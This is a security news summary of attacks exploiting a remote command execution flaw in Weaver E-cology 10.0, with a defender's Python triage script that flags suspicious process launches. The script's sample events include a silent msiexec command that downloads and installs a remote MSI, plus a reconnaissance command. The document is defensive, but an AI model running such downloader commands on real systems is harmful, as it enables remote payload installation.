Researchers at Vega documented attacks, beginning in mid-March, that exploited CVE-2026-22679 in Weaver E-cology 10.0, a flaw that allowed unauthenticated remote command execution via an exposed debug API. Attackers ran discovery commands and attempted PowerShell payloads and a target-aware MSI (fanwei0324.msi), but endpoint defenses blocked execution. The vendor's March 12 fix removes the vulnerable endpoint; users should apply the update immediately.
Key points
- A critical unauthenticated RCE (CVE-2026-22679) affected Weaver E-cology 10.0 builds prior to March 12.
- The flaw stemmed from an exposed debug API that passed user-supplied parameters to backend RPC without authentication or validation.
- Attackers executed reconnaissance commands and tried PowerShell-based payloads and a target-aware MSI (fanwei0324.msi) after confirming RCE capability via a Goby-linked callback.
- Endpoint defenses blocked downloads and execution, and attackers never established a persistent session on the targeted hosts.
- The vendor patch (build 20260312) removes the debug endpoint, and upgrading is the only recommended mitigation.
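
A triage sketch for defenders based on the key points above. It is an added example, not code from Vega's report or the vendor. It checks a build string against the fixed build and reviews process-creation events for the reported MSI name or for shells and installers spawned by the application server. The event field names, the Java parent process names, the list of suspect child processes and the sample events are assumptions constructed for illustration.

```python
import re

FIXED_BUILD = 20260312        # from the page: build that removes the debug endpoint
MSI_IOC = "fanwei0324.msi"    # from the page: installer the attackers tried to run
# Assumption: the E-cology service runs under a Java process; adjust per deployment.
APP_PARENTS = {"java.exe", "javaw.exe"}
# Assumption: children an application server should not normally spawn.
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "msiexec.exe",
                    "whoami.exe", "ipconfig.exe", "net.exe"}

def build_is_vulnerable(build: str) -> bool:
    """True for builds dated before the fixed build (accepts 20260311 or 2026-03-11)."""
    digits = re.sub(r"\D", "", build)
    if len(digits) != 8:
        raise ValueError(f"unrecognised build string: {build!r}")
    return int(digits) < FIXED_BUILD

def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def triage(events):
    """Return (host, image, reasons) for each process-creation event worth review."""
    findings = []
    for ev in events:
        image, parent = _basename(ev["image"]), _basename(ev["parent"])
        reasons = []
        if MSI_IOC in ev["cmdline"].lower():
            reasons.append("msi-ioc")
        if parent in APP_PARENTS and image in SUSPECT_CHILDREN:
            reasons.append("app-server-spawned-child")
        if reasons:
            findings.append((ev["host"], image, reasons))
    return findings

# Constructed sample events (hosts, paths and the address are illustrative).
SAMPLE_EVENTS = [
    {"host": "ec-app01", "parent": r"C:\ecology\jdk\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"host": "ec-app01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://198.51.100.7/fanwei0324.msi"},
    {"host": "ec-app01", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\ecology\jdk\bin\java.exe", "cmdline": "java -jar app.jar"},
    {"host": "ws-17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

A hit from either rule on a host still running a build before 20260312 is a reason to review that host, even where endpoint defenses blocked the payload.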